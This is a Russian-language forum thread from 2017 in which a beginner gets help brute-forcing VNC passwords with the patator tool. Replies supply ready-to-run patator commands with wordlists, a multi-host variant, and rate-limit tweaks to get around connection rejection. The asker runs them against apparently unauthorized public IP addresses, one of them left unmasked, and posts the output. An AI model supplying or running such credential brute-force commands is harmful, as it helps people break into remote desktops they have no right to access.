HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.03.2017, 18:16
lok888
Guest
Сообщений: n/a
Провел на форуме:
11485

Репутация: 0
По умолчанию

прочел что pratator который идет в комплекте кали линукс брутит vnc.

помогите с командами пожалуйста: как осуществить брут ip:8000 c помощью patator?
 
Ответить с цитированием

  #2  
Старый 11.03.2017, 13:24
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию

patator. Пример:

patator vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
 
Ответить с цитированием

  #3  
Старый 11.03.2017, 15:03
lok888
Guest
Сообщений: n/a
Провел на форуме:
11485

Репутация: 0
По умолчанию

Цитата:
Сообщение от billybonse  
billybonse said:

patator. Пример:
patator vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
Да, я нашел такой пример но что-то не так сделал. Нужно ли заменять переменные кроме passwords.txt еще какие-то?

добавил впередт patator, вроде запустился )) подожду результата

прошло пол часа и ... ничего...

вот так такую команду ввел:

patator vnc_login host=116.58.241.185 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

такой результат:

Код:
Code:
patator vnc_login host=101.2.1.01 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
21:03:54 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-11 21:03 VLAT
21:03:54 patator    INFO -                                                                             
21:03:54 patator    INFO - code  size   time | candidate                          |   num | mesg
21:03:54 patator    INFO - -----------------------------------------------------------------------------

21:26:36 patator    INFO - Progress:   0% (0/91) | Speed: 1 r/s | ETC: 21:28:07 (00:01:31 remaining)

22:23:20 patator    INFO - Progress:   0% (0/91) | Speed: 1 r/s | ETC: 22:24:51 (00:01:31 remaining)
^C22:23:41 patator    INFO - Hits/Done/Skip/Fail/Size: 0/0/0/0/91, Avg: 0 r/s, Time: 1h 19m 46s
22:23:41 patator    INFO - To resume execution, pass --resume 0
не подскажете что значит ? )) и почему полтора часа думал а прогресс 0% ?
 
Ответить с цитированием

  #4  
Старый 13.03.2017, 11:30
Zayac
Guest
Сообщений: n/a
Провел на форуме:
29728

Репутация: 0
По умолчанию

А где коды ошибок ответы сервера? по них сразу видно в чем дело..

Не совсем я разобрался зачем это retry при ошибке 'Authentication failure' пароль не подошел иpatator все-ровно будет пробовать следующий из словаря..

--max-retries тоже не совсем понятно что за полезная нагрузка если после 4 попыток по умолчанию спокойно перебирает пароль дальше...

запускаю брут так:

Код:
Code:
patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out
при ошибке Session setup failed: "Your connection has been rejected нужно увеличивать --rate-limit задержку отправки пароля.. для обычного TightVNC 3sec - other 14-15sec.....

Еще бы кто подсказал как сделать чтоб при code=0 Ok хост удалялся или как-то пропускался из брута(пробивал action free вываливается с ошибкой после кода 0). и это все хосты с ответами FAIL code xxx тоже б если на автомате удалялись из списка было б супер.
 
Ответить с цитированием

  #5  
Старый 13.03.2017, 12:12
lok888
Guest
Сообщений: n/a
Провел на форуме:
11485

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zayac  
Zayac said:

А где коды ошибок ответы сервера? по них сразу видно в чем дело..
Не совсем я разобрался зачем это
retry
при ошибке 'Authentication failure' пароль не подошел и
patator
все-ровно будет пробовать следующий из словаря..
--max-retries
тоже не совсем понятно что за полезная нагрузка если после 4 попыток по умолчанию спокойно перебирает пароль дальше...
запускаю брут так:
Код:
Code:
patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out
при ошибке Session setup failed: "Your connection has been rejected нужно увеличивать --rate-limit задержку отправки пароля.. для обычного TightVNC 3sec - other 14-15sec.....
Еще бы кто подсказал как сделать чтоб при
code=0
Ok хост удалялся или как-то пропускался из брута(пробивал action free вываливается с ошибкой после кода 0). и это все хосты с ответами FAIL code xxx тоже б если на автомате удалялись из списка было б супер.
Спасибо, так попробую.

Я слвсем новичек -еще не знаю что в patatore означают какие команды(
 
Ответить с цитированием

  #6  
Старый 13.03.2017, 12:21
Zayac
Guest
Сообщений: n/a
Провел на форуме:
29728

Репутация: 0
По умолчанию

если указать наоборот для хоста 0 а password 1 то вначале все пароли с словаря будут подбиратся к 1 хосту далее 2 и т. д. а так по паролю на каждый хост c файла host.txt

-l out -- сохраняет логи брута в папку out
 
Ответить с цитированием

  #7  
Старый 13.03.2017, 14:59
lok888
Guest
Сообщений: n/a
Провел на форуме:
11485

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zayac  
Zayac said:

patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out
t
запустил брут с вашей командой. пока такой вот результат:

Код:
Code:
patator vnc_login host=FILE1 1='/root/Рабочий стол/hosts' password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 --rate-limit=3 -x ignore:code=1 -l out
Directory '/root/out' is not empty, do you want to wipe it ? [Y/n]: y
20:26:37 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-13 20:26 VLAT
20:26:37 patator    INFO -                                                                             
20:26:37 patator    INFO - code  size   time | candidate                          |   num | mesg
20:33:50 patator    FAIL - xxx   50    0.000 | admin:145.24.321.111               |     9 |  (111, 'Connection refused')
20:35:00 patator    FAIL - xxx   39    0.000 | admin:145.24.321.111              |    10 |  ('timed out',)
20:35:30 patator    FAIL - xxx   50    0.000 | admin123:145.24.321.111            |    11 |  (111, 'Connection refused')
20:36:40 patator    FAIL - xxx   39    0.000 | admin123:145.24.321.111            |    12 |  ('timed out',)
 
Ответить с цитированием

  #8  
Старый 13.03.2017, 16:49
Zayac
Guest
Сообщений: n/a
Провел на форуме:
29728

Репутация: 0
По умолчанию

Хост неотвечает -- нет связи.. Откуда вообще такой IP 145.24.321 что за 321 ?? максимум 254
 
Ответить с цитированием

  #9  
Старый 13.03.2017, 18:04
lok888
Guest
Сообщений: n/a
Провел на форуме:
11485

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zayac  
Zayac said:

Хост неотвечает -- нет связи.. Откуда вообще такой IP 145.24.321 что за 321 ?? максимум 254
знаю.)) наобум натыкал цифр, чтоб не показывать всем сканируемый IP.

не отвечает - значит никак в него не "прорваться" ?

или на нем вообще нет vnc ?

просто nmap показал что удаленный рабочий стол есть на нем порт 3389. или я путаю понятия ?
 
Ответить с цитированием

  #10  
Старый 13.03.2017, 21:17
Zayac
Guest
Сообщений: n/a
Провел на форуме:
29728

Репутация: 0
По умолчанию

вообще нет vnc порт 5900
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ